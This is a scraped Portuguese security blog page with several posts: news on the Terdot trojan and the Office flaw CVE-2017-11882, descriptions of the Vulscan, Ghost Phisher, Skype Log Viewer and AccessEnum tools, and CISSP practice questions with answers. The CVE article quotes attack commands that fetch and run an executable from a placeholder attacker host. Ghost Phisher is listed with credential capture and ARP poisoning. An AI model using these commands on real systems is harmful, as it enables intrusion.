e-forense - Análise Forense Computacional, Hacking, Segurança & Código

O Vulscan é um módulo que aumenta as capacidades do nmap para realizar scans de vulnerabilidades.



A opção nmap -sV permite a detecção de versão por serviço, que é usada para determinar possíveis falhas de acordo com o produto identificado. Os dados são pesquisados numa versão offline do VulDB.

Até ao momento as bases de dados seguintes vêm pré-instaladas:

• scipvuldb.csv
• cve.csv
• osvdb.csv
• securityfocus.csv
• securitytracker.csv
• xforce.csv
• expliotdb.csv
• openvas.csv

Instalação:

Para instalar basta copias os ficheiros para a pasta:

Utilização:

Para executar o comando mais básico e iniciar um scan de vulnerabilidade simples basta:

Download & Links úteis:

Investigadores de segurança informática descobriram uma nova e sofisticada forma de malware baseada no notório trojan bancário Zeus que rouba mais do que apenas detalhes de contas bancárias.



Conhecido por Terdot, o trojan bancário existe desde meados de 2016 e inicialmente foi desenhado para operar como um proxy para conduzir ataques Man-in-the-Middle (MitM), roubar informações de navegação, tais como informações de cartões de crédito armazenados e credenciais de login e ainda injetar código HTML malicioso nas páginas web visitadas.

Contudo, investigadores da empresa de segurança informática Bitdefender descobriram que o trojan bancário agora foi renovado com novas capacidades de espionagem, como alavancar ferramentas open source para spoofing de certificados SSL por forma a obter acesso a redes sociais e contas de e-mail e até mesmo publicar em nome dos utilizadores infectados.

Terdot faz isso utilizando um MitN proxy altamente personalizado que permite ao malware interceptar qualquer tráfego num computador infectado.

Além disso, a nova variante do Terdot adicionou recursos de atualização automática que permitem que o malware faça download e execute arquivos conforme solicitado pelo operador.

Normalmente, Terdot visava sites de instituições bancárias do Canada, como o Royal Bank, Banque Nationale, PCFinancial, Desjardins, BMO (Banco de Montreal) e a Scotiabank, entre outros.

No entanto, de acordo com análises mais recentes, o Terdot pode visar redes sociais, incluindo Facebook, Twitter, Google Plus e YouTube, mas também serviços de e-mail, incluindo o Gmail, o Live, Hotmail, Outlook e o Yahoo Mail.

Curiosamente, o malware evita a recolha de dados relacionados à rede social maior da Rússia, VKontakte (vk.com), observou a Bitdefender. Isso sugere que quem poderá estar por trás desta nova variante do malware sejam atores da Europa Oriental.

O trojan está a ser distribuído principalmente por sites comprometidos através do SunDown Exploit Kit, mas também já foi observado a sua distribuição através de emails maliciosos que imitam um PDF.

Ao clicar no PDF, o trojan executa código JavaScript obfuscado que posteriormente faz o download e executa o arquivo de malware. A fim de evadir a detecção ele usa uma cadeia complexa de droppers, injeções e downloaders que permitem o download de Terdot aos pedaços.

Uma vez infectado, o trojan infiltra-se no processo do navegador para redirecionar as ligações através da sua própria web proxy, sniffar o tráfego e injetar spyware. Também pode roubar informações de autenticação inspecionando os pedidos da vítima ou injetando código spyware em Javascript nas respostas.

Terdot também pode ignorar as restrições impostas pelo TLS (Transport Layer Security) ao gerar a sua própria Autoridade de Certificação (CA) e gerar certificados para cada domínio que a vítima visita.

Todos os dados que as vítimas enviam para uma conta bancária ou redes sociais puderam ser interceptados e modificados pelo Terdot em tempo real, o que também pode permitir que ele se espalhe ao publicar links falsos em outras contas de redes sociais.

A Bitdefender tem vindo a acompanhar a nova variante do Terdot desde que este ressurgiu em outubro do ano passado.

Para mais detalhes sobre a nova ameaça, existe um documento técnico publicado pela Bitdefender.

Ghost Phisher é uma ferramenta para auditoria de segurança em redes sem fio e por ethernet escrita em Python e usa a biblioteca Python Qt GUI para o interface, o programa é capaz de emular pontos de acesso e permite implementar vários tipos de servidores de rede internos para redes, testes de penetração e ataques de phising.


A ferramenta vem com um servidor DNS falso, servidor DHCP falso, servidor HTTP falso e também possui uma área integrada para captura automática e registro de credenciais do método de formulário HTTP para uma base de dados. Pode ser usado como honey pot e também pode ser usado para solicitações de DHCP, pedidos de DNS ou ataques de phishing.

Características do Ghost Phisher:

• Servidor HTTP
• Servidor DNS RFC 1035
• Servidor DHCP RFC 2131
• Alojamento web e captura de credenciais (Phishing)
• Emulador de ponto de acesso WIFI
• Sequestro de sessão (modos passivo e ethernet)
• ARP Cache Poisoning (MITN e DoS)
• Penetração usando ligações ao Metasploit
• Registo automático de credenciais numa base de dados SQlite
• Suporte de atualizações

 Pré-requisitos:

As seguintes dependências podem ser instaladas usando o comando do instalador de pacotes do Debian em sistemas baseados em Debian utilizando "apt-get install program" ou de outra forma fazendo o download e instalando manualmente.

• Aircrack-NG
• Python-Scapy
• Python Qt4
• Python
• Subversion
• Xterm
• Metasploit Framework 

Quando o mundo ainda está a recuperar da ameaça do recurso não corrigido DDE no pacote Microsoft Office, os investigadores descobriram mais um problema sério com outro componente do Office, este permite alguém malicioso instalar remotamente malware.

A vulnerabilidade é um problema de corrupção de memória que reside em todas as versões do Microsoft Office lançados nos últimos 17 anos, incluindo o Microsoft Office 365, e funciona contra todas as versões do sistema operacional Windows, incluindo a atualização mais recente Microsoft Windows 10 Creators.

Descoberto por investigadores de segurança da empresa Embedi, a vulnerabilidade leva à execução de código remoto, permitindo que um hacker remoto não autenticado execute código malicioso num sistema específico sem exigir a interação do utilizador depois deste abrir um documento mal-intencionado.

A vulnerabilidade, foi identificada como CVE-2017-11882, e reside no ficheiro executável EQNEDT32.EXE, um componente do MS Office responsável pela inserção e edição de equações (objetos OLE) nos documentos.



No entanto, devido a operações inadequadas de memória, o componente não processa adequadamente objetos na memória, corrompendo-o de tal forma que o hacker consegue executar código malicioso como o utilizador.

À dezassete anos atrás, o EQNEDT32.EXE foi introduzido no Microsoft Office 2000 e foi mantido em todas as versões lançadas após o Microsoft Office 2007, para garantir a retrocompatibilidade entre documentos de versões mais antigas.

DEMONSTRAÇÃO: Vulnerabilidade permite controlo total de um sistema

Esta vulnerabilidade exige a abertura de um arquivo malicioso especialmente criado com uma versão afetada do software Microsoft Office ou Microsoft WordPad.

Pode assumir o controlo total de um sistema quando combinado com as vulnerabilidades de elevação de privilégios do kernel do Windows (como o CVE-2017-11847).

Um cenário possível:

Ao explicar o alcance da vulnerabilidade, os investigadores da Embedi sugeriram vários cenários possíveis:

"Ao inserir vários objetos OLE que exploraram a vulnerabilidade descrita, foi possível executar uma sequência arbitrária de comandos (por exemplo, fazer download de um arquivo da Internet e executá-lo)".

"Uma das maneiras mais fáceis de executar código arbitrário é usar um arquivo executável de um servidor WebDAV comprometido ".

"No entanto, um hacker também pode usar a vulnerabilidade para executar os comandos shell como cmd.exe / c start \\ attacker_ip \ ff. Este comando pode ser utilizado para iniciar um WebClient".

"Depois disso, o hacker pode correr um executável do servidor WebDAV usando o comando \\ attacker_ip \ ff \ 1.exe.".

Como proteger contra esta vulnerabilidade:

Com o lançamento do Patch deste mês, a Microsoft abordou esta vulnerabilidade ao alterar a forma como o software afetado lida com os objetos na memória.

Portanto, os utilizadores são fortemente recomendados para aplicar os patches de segurança de novembro o mais rápido possível para evitar que hackers e ciber criminosos tomem controlo dos seus computadores.

Uma vez que este componente tem uma série de problemas de segurança que podem ser facilmente explorados, desativá-lo pode ser a melhor maneira de garantir a segurança dos seus sistemas.

Os utilizadores podem executar o seguinte comando shell para desabilitar o registo do componente no Windows Registry:

Para 32-Bits:



Para 64-Bits:



Além disso, os utilizadores também devem ativar Protected View (Microsoft Office sandbox) para evitar a execução de conteúdo ativo (OLE / ActiveX / Macro).

A ferramenta Skype Log Viewer permite que o utilizador faça o download e visualize o histórico e os arquivos de log de uma conta de Skype em Windows, sem ter de utilizar o próprio cliente Skype.

O que o Skype Log Viewer faz?

Este programa permite visualizar todos os seus logs de conversas do Skype e, em seguida, exportá-los facilmente como arquivos de texto. Também os organiza correctamente por conversa e garante que as conversas de grupo não se confundem com conversas de um para um.

Este projecto é open source e de uso livre, ao longo dos tempos tem sofrido actualizações, sendo a ultima versão de Abril de 2017.

Para quem faz análise forense digital, esta é uma ferramenta para ter em carteira!

Características do Skype Log Viewer:

• Download dos logs do Skype
• Suporte para base de dados corrumpida
• Possibilidade para vários formatos de exportação
• Organiza por conversas

Pode fazer o download do Skype Log Viewer aqui:

Versão compilada: SkypeLogViewerLGGv1.3.exe
Versão código fonte: skype-log-viewer-v1.3.zip

Pode ler mais sobre o projecto na página de github.

Sexta parte do question dump para o CISSP

Bom antes do exame convém sempre, para além da frequência do curso, ter alguma literatura:

- https://umeshume.files.wordpress.com/2013/03/mcgraw-hill-osborne-media-cissp-all-in-one-exam-guide-6th-edition-2012.pdf

Dar uma vista atenta a este link: http://opensecuritytraining.info/CISSP-Main.HTML

---

Question:
Which of the following statements is false?

A.A disaster recovery team’s primary task is to restore critical business functions at the alternate backup processing site.
B.A disaster salvage team’s task is to ensure that the primary site returns to normal processing conditions.
C.The disaster recovery plan should include how the company will return from the alternate site to the primary site.
D.When returning to the primary site, the most critical applications should be brought back first.

Answer:
D.When returning to the primary site, the most critical applications should be brought back first.

Explanation:
When the primary site is ready to receive operations again, less critical systems should be brought back first to ensure that everything is running smoothly before returning critical systems, which are already operating normally at the recovery site.

Question:
The least expensive and most difficult to test computer recovery site is a:

A.Non-mobile hot site
B.Mobile hot site
C.Warm site
D.Cold site

Answer:
D.Cold site

Explanation:
The cold site’s lack of equipment reduces its annual cost, but complicates testing or recovery because the equipment must be obtained, shipped, and installed at the site prior to use.

Question:
_______________ includes activities to test and validate system capability and functionality and outlines actions that can be taken to return the system to normal operating condition and prepare the system against future outages.

A.Activation
B.Recovery
C.Reconstitution
D.Validation

Answer:
C.Reconstitution

Explanation:
The Activation/Notification Phase describes the process of activating the plan based on outage impacts and notifying recovery personnel. The Recovery Phase details a suggested course of action for recovery teams to restore system operations at an alternate site or using contingency capabilities. The final phase, Reconstitution, includes activities to test and validate system capability and functionality and outlines actions that can be taken to return the system to normal operating condition and prepare the system against future outages.

Question:
What is a main advantage of using hot sites?

A.Costs are relatively low.
B.They can be used for an extended amount of time.
C.They do not require that equipment and systems software be compatible with the primary installation being backed up.
D.They can be made ready for operation quickly.

Answer:
D.They can be made ready for operation quickly.

Explanation:
The main advantage of hot sites is that they can normally be made ready for operation within hours.

Question:
A business continuity plan is an example of a __________ control.

A.Corrective
B.Detective
C.Preventive
D.Collective

Answer:
A.Corrective

Explanation:
Business continuity plans are designed to minimize the damage inflicted by an event and to facilitate restoration of the organization to its full operational capacity.

Question:
Business continuity plans are required for:

A.All areas of the enterprise
B.Financial resources and information processing
C.Operating areas of the enterprise
D.Marketing, finance, and information processing

Answer:
A.All areas of the enterprise

Explanation:
Business continuity plans are required for all parts of an enterprise.

Question:
In disaster recovery planning, what is the recovery point objective?

A.The point to which application data must be recovered to resume business operations
B.The maximum elapsed time required to complete recovery of application data
C.The point to which application data must be recovered to resume system operations
D.The point to which information system must be operational at an alternate site

Answer:
C.The point to which application data must be recovered to resume system operations

Explanation:
The Recovery Point Objective (RPO) is the point in time to which you must recover data as defined by your organization. This is generally a definition of what an organization determines is an "acceptable loss" in a disaster situation. If the RPO of a company is 2 hours and the time it takes to get the data back into production is 5 hours, the RPO is still 2 hours. Based on this RPO the data must be restored to within 2 hours of the disaster.

Question:
In contingency planning, the first step is:

A.Perform a hardware backup
B.Perform a data backup
C.Perform an operating systems software backup
D.Perform an application software backup

Answer:
B.Perform a data backup

Explanation:
A data backup is the first step in contingency planning. Without data, there is nothing to process.

Question:
The most devastating business interruptions are the result of loss of:

A.Hardware/software
B.Data
C.Communication links
D.Applications

Answer:
B.Data

Explanation:
Loss of data can cause the most damage to an enterprise in the short and long run.

Question:
The Information Systems Contingency Plan does not include which of the following?

A.Information on system recovery
B.Information on roles and responsibilities
C.Assessment results
D.Testing procedures

Answer:
C.Assessment results

Explanation:
The Information Systems Contingency Plan provides key information needed for system recovery, including roles and responsibilities, inventory information, assessment procedures, detailed recovery procedures, and testing of a system.

---

Parte 1: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems.html
Parte 2: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_1.HTML
Parte 3: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_2.HTML
Parte 4: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_5.html
Parte 5: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_8.html

Quinta parte do question dump para o CISSP

Bom antes do exame convém sempre, para além da frequência do curso, ter alguma literatura:

- https://umeshume.files.wordpress.com/2013/03/mcgraw-hill-osborne-media-cissp-all-in-one-exam-guide-6th-edition-2012.pdf

Dar uma vista atenta a este link: http://opensecuritytraining.info/CISSP-Main.HTML

---

Question:
Business continuity plans address all of the following except:

A.Critical servers used on the company's LAN
B.The most critical devices housed in the main data center
C.Individual workstations that are used by operations personnel
D.The protection of cold sites at a remote location

Answer:
D.The protection of cold sites at a remote location

Explanation:
A BCP does not address the protection of cold sites at remote location.

Question:
Organizations should not view disaster recovery as:

A.A committed expense
B.A discretionary expense
C.An enforcement of legal statues
D.Compliance with regulations

Answer:
B.A discretionary expense

Explanation:
Businesses need to treat disaster recovery planning as a committed expense, much like insurance is a requirement. In many sectors, disaster recovery is a legal requirement.

Question:
Which of the following best describes a continuity of operations plan?

A.Establishes senior management and a headquarters after a disaster. Outlines roles and authorities, orders of succession, and individual role tasks.
B.Plan for systems, networks, and major applications recovery procedures after disruptions. A contingency plan should be developed for each major system and application.
C.Includes internal and external communications structure and roles. Identifies specific individuals who will communicate with external entities. Contains predeveloped statements that are to be released.
D.Focuses on malware, hackers, intrusions, attacks, and other security issues. Outlines procedures for incident response.

Answer:
A.Establishes senior management and a headquarters after a disaster. Outlines roles and authorities, orders of succession, and individual role tasks.

Explanation:
The continuity of operations plan establishes senior management and a headquarters after a disaster. It outlines roles and authorities, orders of succession, and individual role tasks.

Question:
Which of the following best describes a parallel test?

A.A scenario is established and individuals are gathered to go through each step of the plan.
B.Copies of the plan are handed out to representatives from each functional area.
C.Some systems are moved to the alternate site and installed to test processing procedures and compatibility.
D.Management gathers and goes through a structured walk-through test.

Answer:
C.Some systems are moved to the alternate site and installed to test processing procedures and compatibility.

Explanation:
When a parallel test is performed, the critical systems are taken to the site where they would need to perform in an actual disaster.

Question:
Which of the following is not a purpose to develop and implement a disaster recovery plan?

A.Provides procedures for emergency responses
B.Extends backup operations to include more than just backing up data
C.Provides steps for a post-disaster recovery
D.Outlines business functions and systems

Answer:
D.Outlines business functions and systems

Explanation:
The disaster recovery plan does not outline business functions and systems. Those are handled in the business impact analysis.

Question:
A reciprocal agreement is best described how?

A.A site that has some computers and environmental controls
B.A site that has fully redundant systems, software, and configurations
C.A site that is in use by another company already
D.An agreement that is enforceable

Answer:
C.A site that is in use by another company already

Explanation:
A reciprocal agreement is when one company promises another company that it can move in if a disaster hits. This agreement is not enforceable.

Question:
A business impact analysis (BIA) does not typically include:

A.Identifying the type and quantity of resources required for the recovery
B.Identifying critical business processes and the dependencies between them
C.Identifying organizational risks
D.Developing a mission statement

Answer:
D.Developing a mission statement

Explanation:
The development of a mission statement is normally performed before the BIA.

Question:
An off-site information processing facility:

A.Should have the same degree of physical access restrictions as the primary processing site
B.Should be located close to the originating site so that it can quickly be made operational
C.Should be easily identified from the outside for easy emergency access
D.Need not have the same level of environmental monitoring as the originating site since this would be cost prohibitive

Answer:
A.Should have the same degree of physical access restrictions as the primary processing site

Explanation:
An off-site information processing facility should have the same amount of physical control as the originating site.

Question:
Out of the following steps in the development of a disaster recovery plan, which is the second step?

A.Develop an information system contingency plan
B.Create contingency strategies
C.Conduct the business impact analysis (BIA)
D.Ensure plan testing, training, and exercises

Answer:
C.Conduct the business impact analysis (BIA)

Explanation:
The seven progressive steps are designed to be integrated into each stage of the system development life cycle.
- Develop the contingency planning policy statement. A formal policy provides the authority and guidance necessary to develop an effective contingency plan.
- Conduct the business impact analysis (BIA). The BIA helps identify and prioritize information systems and components critical to supporting the organization's mission/business functions. A template for developing the BIA is provided to assist the user.
- Identify preventive controls. Measures taken to reduce the effects of system disruptions can increase system availability and reduce contingency life cycle costs.
- Create contingency strategies. Thorough recovery strategies ensure that the system may be recovered quickly and effectively following a disruption.
- Develop an information system contingency plan. The contingency plan should contain detailed guidance and procedures for restoring a damaged system unique to the system's security impact level and recovery requirements.
- Ensure plan testing, training, and exercises. Testing validates recovery capabilities, whereas training prepares recovery personnel for plan activation and exercising the plan identifies planning gaps; combined, the activities improve plan effectiveness and overall organization preparedness.
- Ensure plan maintenance. The plan should be a living document that is updated regularly.

Question:
An organization wants to gain a common understanding of functions that are critical to its survival. Which of the following will help the most?

A.Risk assessment
B.Business assessment
C.Disaster recovery plan
D.Business impact analysis

Answer:
D.Business impact analysis

Explanation:
A business impact analysis (BIA) is an assessment of an organization’s business functions to develop an understanding of their criticality, recovery time objectives, and resources needed.

---

Parte 1: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems.html
Parte 2: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_1.HTML
Parte 3: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_2.HTML
Parte 4: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_5.html
Parte 6: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_9.html

Quarta parte do question dump para o CISSP

Bom antes do exame convém sempre, para além da frequência do curso, ter alguma literatura:

- https://umeshume.files.wordpress.com/2013/03/mcgraw-hill-osborne-media-cissp-all-in-one-exam-guide-6th-edition-2012.pdf

Dar uma vista atenta a este link: http://opensecuritytraining.info/CISSP-Main.HTML

---

Question:
Which is not a task for senior management in disaster recovery?

A.Approve of final plans
B.Oversee budget
C.Drive all phases of plan
D.Implement the plans themselves

Answer:
D.Implement the plans themselves

Explanation:
Senior management should support all functions of disaster recovery and business continuity, and they should oversee the progress of developing, implementing, and testing the plans. They should also ensure that the proper resources and budget are available. But they are not usually the ones who actually implement the plans.

Question:
Which of the following issues is least important when quantifying risks associated with a potential disaster?

A.Gathering information from agencies that report the probability of certain natural disasters taking place in that area
B.Identifying the company’s key functions and business requirements
C.Identifying critical systems that support the company’s operations
D.Estimating the potential loss and impact the company would face based on how long the outage lasts

Answer:
A.Gathering information from agencies that report the probability of certain natural disasters taking place in that área

Explanation:
Information gathered from agencies that report the probability of certain natural disasters taking place in that area would be the least important out of this list.

Question:
Which of the following is the fourth step in a business impact analysis?

A.Identify the company's critical business functions.
B.Calculate how long these functions can survive without these resources.
C.Identify the resources these functions depend upon.
D.Calculate the risk for each different business function.

Answer:
B.Calculate how long these functions can survive without these resources.

Explanation:
The detailed steps of carrying out a business impact analysis are shown below:
. Select individuals to interview for data gathering.
. Create data-gathering techniques (surveys, questionnaires, qualitative and quantitative approaches).
. Identify the company's critical business functions.
. Identify the resources these functions depend upon.
. Calculate how long these functions can survive without these resources.
. Identify vulnerabilities and threats to these functions.
. Calculate the risk for each different business function.
. Document findings and report them to management.

Question:
Which of the following statements is true of a full-scale BCP?

A.It is a long-term project.
B.It is a short-term project.
C.It is a single entity venture.
D.BCP guarantees no service interruption.

Answer:
A.It is a long-term project.

Explanation:
A BCP plan is a long-term project and must have support from upper management. It could take a year or more for a small to medium-size business before the plan is implemented and fully tested.

Question:
A hot site offers ___ recovery with ____ costs.

A.Instant, high
B.Moderate, high
C.Instant, low
D.Moderate, low

Answer:
A.Instant, high

Explanation:
A hot site has all of the equipment in place and can allow fast recovery. However it is also the most expensive solution.

Question:
Sam is a manager that is responsible for overseeing the development and the approval of the business continuity plan. He needs to make sure that his team is creating a correct and all inclusive loss criteria when it comes to potential business impacts. Which of the following should not be included in this criteria?
i. Loss in reputation and public confidence
ii. Loss of competitive advantages
iii. Decrease in operational expenses
iv. Violations of contract agreements
v. Violations of legal and regulatory requirements
vi. Delayed income costs
vii. Loss in revenue
viii. Loss in productivity

A.i, ii
B.v, vi
C.v
D.iii

Answer:
D.iii

Explanation:
Loss criteria must be applied to the individual threats that were identified. The criteria should include at least the following:
- Loss in reputation and public confidence
- Loss of competitive advantages
- Increase in operational expenses
- Violations of contract agreements
- Violations of legal and regulatory requirements
- Delayed income costs
- Loss in revenue
- Loss in productivity

Question:
Part of operational recovery is designing backup facility configurations to work in an acceptable manner so that business can continue. Which of the following is a setup that allows services to be distributed over two or more in-house centers?

A.Hot site
B.Multi-processing center
C.Mobile site
D.Reciprocal agreements

Answer:
B.Multi-processing center

Explanation:
A multi-processing center allows a company to have backup over multiple facilities where services have been distributed.

Question:
Recovery strategies are pre-established and management-______ steps that should be put into action in the event of a disaster.

A.Approved
B.Directed
C.Requested
D.Documented

Answer:
A.Approved

Explanation:
Recovery strategies are planned ahead of time before they are needed. These strategies are approved by management and are tested.

Question:
Amy has been appointed to the BCP team and is in charge of information gathering for the business impact analysis. Amy could use any of the following tools to gather information, except:

A.Surveys
B.Questionnaires
C.Workshops
D.Quantitative formulas

Answer:
D.Quantitative formulas

Explanation:
Amy is only at the information gathering step at this stage. She would not be doing her quantitative or qualitative risk assessment yet.

Question:
Which of the following provides the correct characteristic for the specific data backup type?

A.Differential process backs up the files that have been modified since the last backup
B.Differential process backs up the files that have been modified since the last full backup
C.Incremental process sets the archive bit to 1
D.Differential process sets the archive bit to 1

Answer:
B.Differential process backs up the files that have been modified since the last full backup

Explanation:
A differential process backs up the files that have been modified since the last full backup. When the data need to be restored, the full backup is laid down first, and then the most recent differential backup is put down on top of it.
The differential process does not change the archive bit value. An incremental process backs up all the files that have changed since the last full or incremental backup and sets the archive bit to 0.

---

Parte 1: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems.html
Parte 2: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_1.HTML
Parte 3: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_2.HTML
Parte 5: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_8.html
Parte 6: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_9.html

AccessEnum v1.32



Enquanto o modelo de segurança flexível existente nos sistemas de base Windows NT permitem o controlo total sobre as permissões de segurança e gestão de ficheiros. Já a gestão de permissões de utilizadores para que estes tenham acesso adequado a ficheiros, diretórios e chaves de registro pode ser difícil.

Não existe nenhuma solução built-in para visualizar rapidamente os acessos dos utilizadores a uma arvore de directórios ou a chaves.

AccessEnum dá-lhe uma visão completa do seu sistema de ficheiros e configurações de segurança do Registro em poucos segundos, o que torna esta ferramenta ideal para ajudá-lo a procurar falhas de segurança e bloquear permissões onde for necessário.

Mais informação: http://technet.microsoft.com/en-us/sysinternals/bb897332
Download: http://download.sysinternals.com/files/AccessEnum.zip

Terceira parte do question dump para o CISSP

Bom antes do exame convém sempre, para além da frequência do curso, ter alguma literatura:

- https://umeshume.files.wordpress.com/2013/03/mcgraw-hill-osborne-media-cissp-all-in-one-exam-guide-6th-edition-2012.pdf

Dar uma vista atenta a este link: http://opensecuritytraining.info/CISSP-Main.HTML

---

Question:
Which are the proper steps of developing a disaster recovery and continuity plan?

A.Project initiation, strategy development, business impact analysis, plan development, implementation, testing, and maintenance
B.Strategy development, project initiation, business impact analysis, plan development, implementation, testing, and maintenance
C.Implementation and testing, project initiation, strategy development, business impact analysis, and plan development
D.Plan development, project initiation, strategy development, business impact analysis, implementation, testing, and maintenance

Answer:
A.Project initiation, strategy development, business impact analysis, plan development, implementation, testing, and maintenance

Explanation:
These steps outline the processes that should take place from beginning to end pertaining to these types of plans.

Question:
During development, testing, and maintenance of the disaster recovery and continuity plan, a high degree of interaction and communication is crucial to the process. Why?

A.This is a regulatory requirement of the process.
B.The more people talk about it and get involved, the more awareness will increase.
C.This is not crucial to the plan and should not be interactive because it will most likely affect operations
D.Management will more likely support it.

Answer:
B.The more people talk about it and get involved, the more awareness will increase.

Explanation:
Communication not only provides awareness of these plans and their contents, but also allows more people to discuss the possible threats and solutions that the original team may not uncover.

Question:
John has to create a team to carry out a business impact analysis and develop the company's business continuity plan. Which of the following should not be on this team?
i. Business units
ii. Senior management
iii. IT department
iv. Security department
v. Communications department
vi. Legal department

A.v.
B.None of them
C.All of them
D.i

Answer:
B.None of them

Explanation:
The best plan is when all issues and threats are brought to the table and discussed. This cannot be done effectively with a few people who are familiar with only a couple of departments. Representatives from each department must be involved with not only the planning stages but also the testing and implementation stages.
The committee should be made up of representatives from at least the following departments:
- Business units
- Senior management
- IT department
- Security department
- Communications department
- Legal department

Question:
When is the emergency state actually over for a company?

A.When all people are safe and accounted for
B.When all operations and people are moved back into the primary site
C.When operations are safely moved to the off-site facility
D.When a civil official declares that all is safe

Answer:
B.When all operations and people are moved back into the primary site

Explanation:
The emergency state is not actually over until the company moves back into their primary site. The company is still vulnerable and at risk while it is operating in an altered or crippled state. This state of vulnerability is not over until the company is back operating in the fashion that it was prior to the disaster. Of course, this may mean that the primary site has to be totally rebuilt if it was destroyed.

Question:
Using another company's facilities in the event of a disaster is called what?

A.Rolling hot site
B.Redundant site
C.Merger
D.Reciprocal agreement

Answer:
D.Reciprocal agreement

Explanation:
Reciprocal agreements with other companies can be a cheap alternative to disaster recovery but are very difficult to enforce legally. A reciprocal agreement is not enforceable, meaning that the company that agreed to let the damaged company work out of its facility can decide not to allow this to take place.
A reciprocal agreement is a better secondary backup option if the primary plan falls through.

Question:
A disaster recovery procedure involving all affected departments acting out a specific scenario, but which does not go to an off-site facility, is referred to as a:

A.Simulation test
B.Structured walk-through test
C.Checklist test
D.Parallel test

Answer:
A.Simulation test

Explanation:
Simulation tests measure the responsiveness of each department during an emergency situation. A scenario is constructed, as in a flood, earthquake, or terrorist attack, and people are to carry out the tasks expected of them.

Question:
What should be done first when the original facility becomes operational again following a disaster?

A.Inform the media and stockholders
B.Inform all of the employees
C.Move the most critical functions to the original facility
D.Move the least critical functions to the original facility

Answer:
D.Move the least critical functions to the original facility

Explanation:
To ensure that critical business functions and systems continue to operate during a move back to the original facility, the first step should be reinstating the least critical functions.

Question:
Which is not true of a reciprocal agreement?

A.It is a temporary solution.
B.It is expensive.
C.It is difficult to enforce.
D.Most environments are not able to support multiple business operations at one time.

Answer:
B.It is expensive.

Explanation:
While a reciprocal agreement is difficult to implement and enforce, it does offer an extremely inexpensive alternative to disaster recovery. It is an agreement between two companies which usually have very similar technologies, to open their doors to the other in case of an emergency or disaster.

Question:
Which of the following disaster recovery tests is the most intrusive to business operations?

A.Parallel
B.Simulation
C.Full-interruption
D.Checklist

Answer:
C.Full-interruption

Explanation:
Full-interruption tests require the original site to be completely shut down and all processes moved to an alternate site. This can be very disruptive to a company, but is the only way to really know the disaster recovery plan will work when it is needed.

Question:
Talking to external organizations after a disaster is important for all of the following reasons except:

A.To inform customers and shareholders of the company's status
B.To redirect unfavorable attention to other entities
C.To ensure that the media is reporting the facts accurately
D.To help stop rumors from developing

Answer:
B.To redirect unfavorable attention to other entities

Explanation:
Informing the public and affected groups is a critical part of disaster recovery so that the company's reputation and overall business status are not damaged. The information that will be reported should be prepared beforehand, along with deciding who will be responsible for communicating the message to the public and press.

---

Parte 1: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems.html
Parte 2: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_1.HTML
Parte 4: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_5.HTML
Parte 5: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_8.html
Parte 6: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_9.html